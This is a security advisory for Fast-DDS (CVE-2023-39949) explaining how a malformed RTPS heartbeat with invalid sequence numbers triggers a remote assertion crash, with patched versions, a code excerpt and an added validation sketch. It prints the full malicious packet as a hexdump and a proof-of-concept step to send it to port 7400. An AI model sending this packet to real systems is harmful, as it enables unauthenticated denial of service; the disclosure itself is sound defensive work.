
Improper validation of sequence numbers leading to remotely reachable assertion failure

High
MiguelCompany published GHSA-3jv9-j9x3-95cg Aug 11, 2023

Package

Fast-DDS

Affected versions

< 2.9.1

Patched versions

2.9.1 / 2.6.5

Description

Summary

This was reported as #3236.
Opening an advisory for CVE assignment as per the request of Miguel.

Details

Hexdump of a (semantically) malformed RTPS heartbeat message:

0000  45 00 00 68 00 01 40 00 40 11 D9 76 80 3D F0 CF  E..h..@.@..v.=..
0010  EF FF 00 01 05 39 1C E8 00 54 08 B9 52 54 50 53  .....9...T..RTPS
0020  02 04 01 0F 01 03 02 42 AC 11 00 02 45 E5 E2 FD  .......B....E...
0030  07 BF 34 00 00 00 10 00 00 00 00 00 00 01 00 C2  ..4.............
0040  00 00 00 00 A7 9B EA 8C BE ED DC CB 00 03 00 00  ................
0050  77 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00  w...............
0060  00 00 00 00 00 00 00 00                          ........

This heartbeat submessage has bad sequence numbers, i.e.,

firstSN.high = 0xc2000100 // -1040187136
firstSN.low = 0x00

lastSN.high = 0x8cea9ba7
lastSN.low = 0xcbdcedbe

The sanity check at MessageReceiver.cpp:1057 invokes the - operator (firstSN - 1):

#include <cassert>
#include <cstdint>

// Minimal sketch of the Fast-DDS type: 'high' is a signed 32-bit value,
// which is why it can hold -1040187136 here.
struct SequenceNumber_t
{
    int32_t high = 0;
    uint32_t low = 0;
    SequenceNumber_t(int32_t hi, uint32_t lo) noexcept : high(hi), low(lo) {}
};

inline SequenceNumber_t operator -(
        const SequenceNumber_t& seq,
        const uint32_t inc) noexcept
{
    SequenceNumber_t res(seq.high, seq.low - inc);

    if (inc > seq.low)
    {
        // Being the type of the parameter an 'uint32_t', the decrement of 'high' will be as much as 1.
        assert(0 < res.high);
        --res.high;
    }

    return res;
}

in which inc (== 1) > seq.low (== 0) holds, so the branch is entered and the assert() fires because 0 < res.high (== -1040187136) is false.
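As an added example (not Fast-DDS code; the struct layout, the 64-bit view and the RTPS range rule firstSN >= 1, lastSN >= firstSN - 1 are this example's own), this parses the HEARTBEAT submessage from the dump above and rejects the malformed range as invalid input instead of asserting:

```cpp
#include <cstdint>
#include <vector>

struct SequenceNumber_t { int32_t high; uint32_t low; };
struct HeartbeatRange { SequenceNumber_t first; SequenceNumber_t last; bool valid; };

// HEARTBEAT submessage copied from offset 0x30 of the advisory's packet dump.
static const std::vector<uint8_t> kHeartbeat = {
    0x07, 0xBF, 0x34, 0x00,                          // id=HEARTBEAT, flags (E bit set), octetsToNextHeader
    0x00, 0x00, 0x10, 0x00,                          // readerId
    0x00, 0x00, 0x00, 0x00,                          // writerId
    0x00, 0x01, 0x00, 0xC2, 0x00, 0x00, 0x00, 0x00,  // firstSN (high, low), little-endian
    0xA7, 0x9B, 0xEA, 0x8C, 0xBE, 0xED, 0xDC, 0xCB,  // lastSN  (high, low), little-endian
    0x00, 0x03, 0x00, 0x00                           // count
};

static uint32_t read_u32(const uint8_t* p, bool little_endian) {
    return little_endian
        ? ((uint32_t)p[0]) | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24)
        : ((uint32_t)p[3]) | ((uint32_t)p[2] << 8) | ((uint32_t)p[1] << 16) | ((uint32_t)p[0] << 24);
}

// Exact 64-bit value of (high, low): high * 2^32 + low never overflows int64_t,
// so the range test below needs no borrow handling and cannot assert.
static int64_t to_int64(const SequenceNumber_t& sn) {
    return (int64_t)sn.high * 4294967296LL + (int64_t)sn.low;
}

// Valid heartbeat range: firstSN >= 1 and lastSN >= firstSN - 1. A negative 'high'
// (as in the dump) fails the first test and the message is dropped.
bool heartbeat_range_valid(const SequenceNumber_t& first, const SequenceNumber_t& last) {
    int64_t f = to_int64(first), l = to_int64(last);
    return f >= 1 && l >= f - 1;
}

// Parses a HEARTBEAT submessage; 'valid' is false if it is short, not a heartbeat,
// or carries an out-of-range sequence-number pair.
HeartbeatRange parse_heartbeat(const std::vector<uint8_t>& buf) {
    HeartbeatRange r{{0, 0}, {0, 0}, false};
    if (buf.size() < 4 + 28 || buf[0] != 0x07) return r;
    bool le = (buf[1] & 0x01) != 0;               // EndiannessFlag
    const uint8_t* body = buf.data() + 4;         // skip the submessage header
    r.first.high = (int32_t)read_u32(body + 8, le);  r.first.low = read_u32(body + 12, le);
    r.last.high  = (int32_t)read_u32(body + 16, le); r.last.low  = read_u32(body + 20, le);
    r.valid = heartbeat_range_valid(r.first, r.last);
    return r;
}
```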

PoC

Run any fastdds process on domain 0.
Send the RTPS packet above to 127.0.0.1:7400.

Impact

This can remotely crash any Fast-DDS process.

Severity

High

CVSS overall score


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE ID

CVE-2023-39949
